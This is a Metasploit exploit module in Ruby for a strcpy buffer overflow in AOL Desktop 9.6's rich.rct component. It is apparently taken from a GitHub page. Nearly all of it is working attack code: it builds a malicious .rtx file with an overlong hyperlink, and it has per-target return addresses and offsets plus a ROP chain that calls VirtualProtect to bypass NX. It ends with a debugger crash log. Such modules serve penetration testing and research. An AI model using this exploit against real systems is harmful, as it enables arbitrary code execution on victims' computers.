Permalink
Fetching contributors…
Cannot retrieve contributors at this time
227 lines (195 sloc) 8.38 KB
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info={})
super(update_info(info,
'Name' => "AOL Desktop 9.6 RTX Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in AOL Desktop 9.6's Tool\rich.rct
component. By supplying a long string of data in the hyperlink tag, rich.rct copies
this data into a buffer using a strcpy function, which causes an overflow, and
results arbitrary code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sup3r', #Initial disclosure, poc (9.5)
'sickn3ss', #9.6 poc
'sinn3r', #Metasploit
'mr_me <steventhomasseeley[at]gmail.com>', #NX bypass target
'silent_dream', #Win 7 target
],
'References' =>
[
[ 'OSVDB', '70741'],
[ 'EDB', '16085' ],
],
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0d\x0a\x3e\x7f",
'StackAdjustment' => -3500,
},
'DefaultOptions' =>
{
'EXITFUNC' => "process",
},
'Platform' => 'win',
'Targets' =>
[
[
'AOL Desktop 9.6 on Windows XP SP3',
{
'Ret' => 0x01DB4542, #0x01DB4542 JMP ESI
'Offset'=> 5391, #Offset to EIP
'Max' => 8000, #Buffer max. Can be more.
},
],
[
'AOL Desktop 9.6 on Windows XP SP3 - NX bypass',
{
'Ret' => 0x6C02D216, # PUSH ESI, POP ESP, POP ESI, POP EDI, POP EDI, RETN 8
'vp' => 0x7C801AD4, # (kernel32.dll) => VirtualProtect()
'Offset' => 5368, # offset to rop
'Max' => 8000, # Buffer max. Can be more.
},
],
[
'AOL Desktop 9.6 on Windows 7',
{
'Ret' => 0x63227D6D, # JMP ESP in coolapi.dll
'Offset' => 4327, # Offset to EIP
'Max' => 8000, # Buffer max. Can be more
}
],
],
'Privileged' => false,
'DisclosureDate' => "Jan 31 2011",
'DefaultTarget' => 0))
register_options(
[
OptString.new( 'FILENAME', [false, 'The filename', 'msf.rtx'] ),
]
)
end
def exploit
if target.name =~ /XP SP3$/
# Compatible with what the poc has, and what I see on my debugger
sploit = ''
sploit << rand_text_alpha(4968+7)
sploit << payload.encoded
sploit << rand_text_alpha(5368-sploit.length)
sploit << make_nops(11)
sploit << "\xe9\x70\xfe\xff\xff" #JMP back 400 bytes
sploit << [target.ret].pack('V')
sploit << make_nops(target['Offset']-sploit.length-2)
sploit << "\xeb\x04"
sploit << [target.ret].pack('V')
sploit << payload.encoded
sploit << rand_text_alpha(target['Max']-sploit.length)
elsif target.name =~ /SP3 - NX bypass$/
#Thanks mr_me for the ROP chain
rop = ''
# This is the start of ESI
rop << rand_text_alpha(4) # junk - > POP ESI
rop << rand_text_alpha(4) # junk - > POP EDI
rop << rand_text_alpha(4) # junk - > POP EDI
rop << "\x66\x21\x5c\x63" # 0x635C2166 (appdata.dll) => POP ECX; RETN
# Take control of the stack pointer right here (EIP)
rop << [target.ret].pack('V') # junk - > RET 8 on the EIP pointer
rop << rand_text_alpha(4) # junk - > RET 8 on the EIP pointer
# Arg 4 of VirtualProtect() -> lpflOldProtect
rop << "\x4c\x4b\x0e\x69" # 0x690E4B4C => RW addr -----------^^
# Arg 2 of VirtualProtect() -> dwsize (0x212C) & setup EAX
rop << "\xf3\xdf\x4b\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBX; RETN
rop << "\xfd\xc6\xb0\x6b" # 0x6BB0C6FD (imfdecode.rct) => MOV EAX,212C; POP EBX; RETN
rop << rand_text_alpha(4) # junk -------------------------------------------^^
rop << "\xf3\xdf\x4b\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBX; RETN
# Arg 3 of VirtualProtect() -> lpflOldProtectflNewProtect (PAGE_EXECUTE_READWRITE)
rop << "\xbb\x07\x98\x64" # 0x649807BB (abook.dll) => XCHG EAX,EDX; RETN
rop << "\x9e\xe4\xc6\x68" # 0x68C6E49E (www.tol) ======> ADD EAX,10; POP EBP; RETN 4
rop << rand_text_alpha(4) # junk --------------------------------------^^
rop << "\xbb\x07\x98\x64" # 0x649807BB (ebook.dll) => XCHG EAX,EDX; RETN
rop << rand_text_alpha(4) # junk ----------------------------------------------^^
# Arg 1 of VirtualProtect() -> return address & lpAddress
# Also, setup call to VirtualProtect() ptr in ESI
rop << "\x3f\x7b\x1e\x67" # 0x671E7B3F (manager.dll) => PUSH ESP; POP EBP; RETN
rop << "\x2c\x10\x49\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBP; RETN
rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
rop << rand_text_alpha(4) # junk ---------------------------------^^
rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
rop << rand_text_alpha(4) # junk ---------------------------------^^
rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
rop << rand_text_alpha(4) # junk ---------------------------------^^
rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
rop << rand_text_alpha(4) # junk ---------------------------------^^
rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) ===========> ADD EAX,0C; POP ESI; RETN
rop << [target['vp']].pack('V') # VirtualProtect() ----------------------------^^
rop << "\x2c\x10\x49\x67" # 0x6749102C (mip.tol) => XCHG EAX,EBP; RETN
# Continue safely, rop nop
rop << "\xdb\x22\x94\x64" # 0x649422DB (manager.dll) ======> POP EDI; RETN
rop << "\xdc\x22\x94\x64" # 0x649422DC (abook.dll) => RETN ----^^
# gently place our code on the stack
rop << "\x7e\x38\xa0\x60" # 0x60A0387E (abook.dll) ===> PUSHAD; RETN
sploit = rand_text_alpha(target['Offset']-602) #688 was the original
#mr_me's offset
sploit << rop
sploit << make_nops(74)
sploit << payload.encoded
#padding to the next offset
sploit << rand_text_alpha(7)
#the next offset
sploit << rop
sploit << make_nops(74)
sploit << payload.encoded
#Padding
sploit << rand_text_alpha(target['Max']-sploit.length)
elsif target.name =~ /Windows 7/
#Thanks silent_dream
sploit = ''
sploit << rand_text_alpha(target['Offset']-2-14)
sploit << "\xeb\x13"
sploit << make_nops(14)
sploit << [target.ret].pack('V')
sploit << make_nops(15)
sploit << payload.encoded
sploit << rand_text_alpha(target['Max'] - sploit.length)
end
link_value = rand_text_alpha(6)
rtx = "<HTML>"
rtx << "<A HREF=\"#{sploit}\">#{link_value}</A>"
rtx << "</HTML>"
print_status("Creating #{datastore['FILENAME']}...")
file_create(rtx)
end
end
=begin
0:000> g
Breakpoint 0 hit
eax=00000006 ebx=06652370 ecx=02d9c898 edx=038d0000 esi=00000000 edi=02d99b30
eip=6909e187 esp=0022e638 ebp=0022e648 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206
rich!ToolInit+0xed2c:
6909e187 e85cd50300 call rich!ToolInit+0x4c28d (690db6e8)
0:000> g
(8d8.924): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=02d38358 ecx=00000000 edx=00000030 esi=02d53cb8 edi=0022e7c4
eip=43434343 esp=0022e760 ebp=0022e780 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
43434343 ?? ???
0:000> dd esi
02d53cb8 43434343 43434343 43434343 43434343
02d53cc8 43434343 43434343 43434343 43434343
02d53cd8 43434343 43434343 43434343 43434343
02d53ce8 43434343 43434343 43434343 43434343
02d53cf8 43434343 43434343 43434343 43434343
02d53d08 43434343 43434343 43434343 43434343
02d53d18 43434343 43434343 43434343 43434343
02d53d28 43434343 43434343 43434343 43434343
=end